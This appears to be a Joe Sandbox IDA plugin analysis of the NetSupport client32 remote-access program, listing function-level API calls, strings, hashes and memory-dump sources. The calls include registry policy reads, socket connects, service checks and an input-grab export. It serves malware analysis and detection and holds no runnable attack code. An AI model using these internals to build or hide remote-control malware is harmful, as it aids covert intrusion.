Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
API String ID: 711243594-1270230032
Opcode ID: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
Instruction ID: 780d96002ff1c571f3ab58ca649bc9daa74988097748e2877fc37ba21b2c8ed0
Opcode Fuzzy Hash: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
Instruction Fuzzy Hash: C541AE76E0022D9BD720DBB59C41BEBF768DB5531CF0044BAED1997240EA71AA84CFE1

Function 11060CD6 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 121registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA

Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774

RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
RegCloseKey.ADVAPI32(?), ref: 11060E21

Strings

Software\Policies\NetSupport, xrefs: 11060D9F
Client.%04d.%s, xrefs: 11060D87
Client, xrefs: 11060D08, 11060E38
DisableUserPolicies, xrefs: 11060E33
%s\%s\%s\, xrefs: 11060DA4
Software\Policies\NetSupport\Client, xrefs: 11060CF4
Standard, xrefs: 11060D66
Client, xrefs: 11060D9A
Software\Policies\NetSupport\Client\Standard, xrefs: 11060D0D

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Enum$Open$CloseValue
String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
API String ID: 2823542970-1528906934
Opcode ID: f23a291274605c94f5649de291e9e8324e3c99fa834c61925fb639831643f0e0
Instruction ID: cd76c2840a1715f7d7d399ef9620e7e6cb5bc654635ea96c8559331baeb526dc
Opcode Fuzzy Hash: f23a291274605c94f5649de291e9e8324e3c99fa834c61925fb639831643f0e0
Instruction Fuzzy Hash: BF417175B4022DABEB21CA11CC81FEEB77CEB54708F1041D9F659A6140DBB06A85CBA5

Function 11060CD4 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 120registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA

Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774

RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
RegCloseKey.ADVAPI32(?), ref: 11060E21

Strings

Software\Policies\NetSupport, xrefs: 11060D9F
Client.%04d.%s, xrefs: 11060D87
Client, xrefs: 11060D08, 11060E38
DisableUserPolicies, xrefs: 11060E33
%s\%s\%s\, xrefs: 11060DA4
Software\Policies\NetSupport\Client, xrefs: 11060CF4
Standard, xrefs: 11060D66
Client, xrefs: 11060D9A
Software\Policies\NetSupport\Client\Standard, xrefs: 11060D0D

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Enum$Open$CloseValue
String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
API String ID: 2823542970-1528906934
Opcode ID: ca7f9e88603ec94af0442a3bac3499ff9c93757cb3b1ec3ef02441429a95366a
Instruction ID: 375c621035b705b1b9e3f4a5420693f98d17ac4dbe140293a3c4dc63feaf086a
Opcode Fuzzy Hash: ca7f9e88603ec94af0442a3bac3499ff9c93757cb3b1ec3ef02441429a95366a
Instruction Fuzzy Hash: F74181B5B4022DABEB21CA118C81FEEB77CEB54708F1041D5F658A6140DBB06E81CBA5

Function 68C67610 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 111networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WSOCK32 ref: 68C67642
connect.WSOCK32(00000000,?,?), ref: 68C67659
WSAGetLastError.WSOCK32(00000000,?,?), ref: 68C67660
_memmove.LIBCMT ref: 68C676D3
select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 68C676F3
GetTickCount.KERNEL32 ref: 68C67717
ioctlsocket.WSOCK32 ref: 68C6775C
SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68C67762
WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 68C6777A
__WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 68C6778B

Strings

*BlockingIO, xrefs: 68C67732
General, xrefs: 68C67683
ConnectTimeout, xrefs: 68C6767E

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
String ID: *BlockingIO$ConnectTimeout$General
API String ID: 4218156244-2969206566
Opcode ID: ffe4dd0fbe1a173d772ab58ed518cc5780256abfa4ca73c5e6768ca75710b8d0
Instruction ID: dcc0d0b1a7c1086f073578a674d4a9cde2e299f5d7ff7ae8b5261aec04ede0b0
Opcode Fuzzy Hash: ffe4dd0fbe1a173d772ab58ed518cc5780256abfa4ca73c5e6768ca75710b8d0
Instruction Fuzzy Hash: 8D414B75D403149BE7208B64CCC8BEE77BAAB44328F8045BAE61993141FB709AC5DBA1

Function 11131260 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11141AB0: _memset.LIBCMT ref: 11141AF5
Part of subcall function 11141AB0: GetVersionExA.KERNEL32(?), ref: 11141B0E
Part of subcall function 11141AB0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
Part of subcall function 11141AB0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
Part of subcall function 11141AB0: FreeLibrary.KERNEL32(00000000), ref: 11141B5F
Part of subcall function 11141AB0: GetSystemDefaultLangID.KERNEL32 ref: 11141B6A

AdjustWindowRectEx.USER32(1113DE08,00CE0000,00000001,00000001), ref: 111312A7
LoadMenuA.USER32(00000000,000003EC), ref: 111312B8
GetSystemMetrics.USER32(00000021), ref: 111312C9
GetSystemMetrics.USER32(0000000F), ref: 111312D1
GetSystemMetrics.USER32(00000004), ref: 111312D7
GetDC.USER32(00000000), ref: 111312E3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 111312EE
ReleaseDC.USER32(00000000,00000000), ref: 111312FA
CreateWindowExA.USER32(00000001,NSMWClass,025C0580,00CE0000,80000000,80000000,1113DE08,?,00000000,?,11000000,00000000), ref: 1113134F
GetLastError.KERNEL32(?,?,?,?,?,110F58A9,00000001,1113DE08,_debug), ref: 11131357

Strings

CreateMainWnd, hwnd=%x, e=%d, xrefs: 1113135F
NSMWClass, xrefs: 11131349
mainwnd ht1=%d, ht2=%d, yppi=%d, xrefs: 1113130E

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
API String ID: 1594747848-1114959992
Opcode ID: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
Instruction ID: c1c99cb922432dc138ba9c202a31cb7aa0d0c26f00a3c7d74779ab3f3301680f
Opcode Fuzzy Hash: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
Instruction Fuzzy Hash: 51318371E00219AFDB109FE58C85FBFFBB8EB88704F204528FA11F7284D67469408BA5

Function 1102C850 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 284servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,?,?,62C07B5E), ref: 1102CA84
OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CA9A
QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CAAE
CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAB5
Sleep.KERNEL32(00000032), ref: 1102CAC6
CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAD6
Sleep.KERNEL32(000003E8), ref: 1102CB22
CloseHandle.KERNEL32(?), ref: 1102CB4F

Strings

>, xrefs: 1102C9FB
NSM.LIC, xrefs: 1102CB87, 1102CB9D, 1102CBCD
NSA.LIC, xrefs: 1102CB96
ProtectedStorage, xrefs: 1102CA94

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
API String ID: 83693535-2077998243
Opcode ID: f7652f20f0480d0e58ed8b063f8ba6e6fa0130e74124b5fc42b694c068d9827e
Instruction ID: feb44ee288a455167e99161b47e0bacd9894a59b82cfe6c7d6bea4f2cf3f1955
Opcode Fuzzy Hash: f7652f20f0480d0e58ed8b063f8ba6e6fa0130e74124b5fc42b694c068d9827e
Instruction Fuzzy Hash: 86B1B675E012299FDB22CFA4CD84BE9B7F5EB48708F5041E9E919A7380E7709A80CF51

Function 1112FC80 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1112FCF0
GetTickCount.KERNEL32 ref: 1112FD21
SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 1112FD34
GetTickCount.KERNEL32 ref: 1112FD3C

Strings

CommonPath, xrefs: 1112FD5F
Warning. SHGetFolderPath took %d ms, xrefs: 1112FD46
schplayer.exe, xrefs: 1112FD78
%s%s, xrefs: 1112FCEA, 1112FD8E
Software\NSL, xrefs: 1112FD64
HasStudentComponents=%d, xrefs: 1112FDB7
runplugin.exe, xrefs: 1112FCCE

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$FolderPathwsprintf
String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
API String ID: 1170620360-4157686185
Opcode ID: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
Instruction ID: f8032102c9863659257b5da4bc21e17edc1143fb98c82bb39be53882a9ddc186
Opcode Fuzzy Hash: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
Instruction Fuzzy Hash: 5731597AE0132A6BEA109FE59C80FFEF7789F5030DF200075ED55EA244EA31A5448B92

Function 11030438 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 249COMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

Part of subcall function 11105D40: OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
Part of subcall function 11105D40: CloseHandle.KERNEL32(00000000), ref: 11105E29
Part of subcall function 11105D40: GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
Part of subcall function 11105D40: LoadLibraryA.KERNEL32(?), ref: 11105E71
Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6

GetStockObject.GDI32(0000000D), ref: 11030672
GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
InterlockedExchange.KERNEL32(02418D48,00001388), ref: 11030746
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
_sprintf.LIBCMT ref: 1103078D
_setlocale.LIBCMT ref: 11030797

Strings

pcicl32, xrefs: 11030851
.%d, xrefs: 11030782
Error %s unloading audiocap dll, xrefs: 1103098F

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorModeObjectProc$CloseDirectoryEventExchangeHandleInterlockedLibraryLoadOpenStockSystem_memset_setlocale_sprintfwsprintf
String ID: .%d$Error %s unloading audiocap dll$pcicl32
API String ID: 3430446287-3899566344
Opcode ID: 51ddca8647ab57187e0e1c166896a53c967c89ca25be28915a6d1b4060b12241
Instruction ID: 7e43821cc75c177b4768292a53131964eea8ecc700feb9324c3a072739083bb6
Opcode Fuzzy Hash: 51ddca8647ab57187e0e1c166896a53c967c89ca25be28915a6d1b4060b12241
Instruction Fuzzy Hash: B291F8B4D06359DEEF02CBF488447ADFEF6AB8430CF1041AAD445A7289FB755A44CB52

Function 11141710 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetVersionExA.KERNEL32(111ECE98,77068400), ref: 11141740
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
_memset.LIBCMT ref: 1114179D

Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,77068400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690

_strncpy.LIBCMT ref: 1114186A

Part of subcall function 111601FD: __isdigit_l.LIBCMT ref: 11160222

RegCloseKey.KERNEL32(00000000), ref: 11141906

Strings

CurrentMajorVersionNumber, xrefs: 11141898
CurrentVersion, xrefs: 111417E4
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 1114176B
Service Pack, xrefs: 1114194D
CurrentMinorVersionNumber, xrefs: 111418D0
CSDVersion, xrefs: 111417BA

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
API String ID: 3299820421-2117887902
Opcode ID: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
Instruction ID: 6295e9c0ce894988be5bd3b5eca6cb3bc4700dba655a443855223a39f27a81e3
Opcode Fuzzy Hash: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
Instruction Fuzzy Hash: A051D975F0022AAFEB21CFA4CC41FEEFBB59B01708F1040A9E519A6181E7707A84CF91

Function 11026810 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11026896
_strtok.LIBCMT ref: 110268D0
Sleep.KERNEL32(?,?,*max_sessions,0000000A,00000000), ref: 110269C4

Strings

Protocols, xrefs: 11026881
*max_sessions, xrefs: 11026926
Client, xrefs: 11026886, 1102692B
Error. not all transports loaded (%d/%d), xrefs: 11026998
TCPIP, xrefs: 110268F2
LoadTransports(%d), xrefs: 1102690C
UseNCS, xrefs: 110268ED
Retrying..., xrefs: 110269B2

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
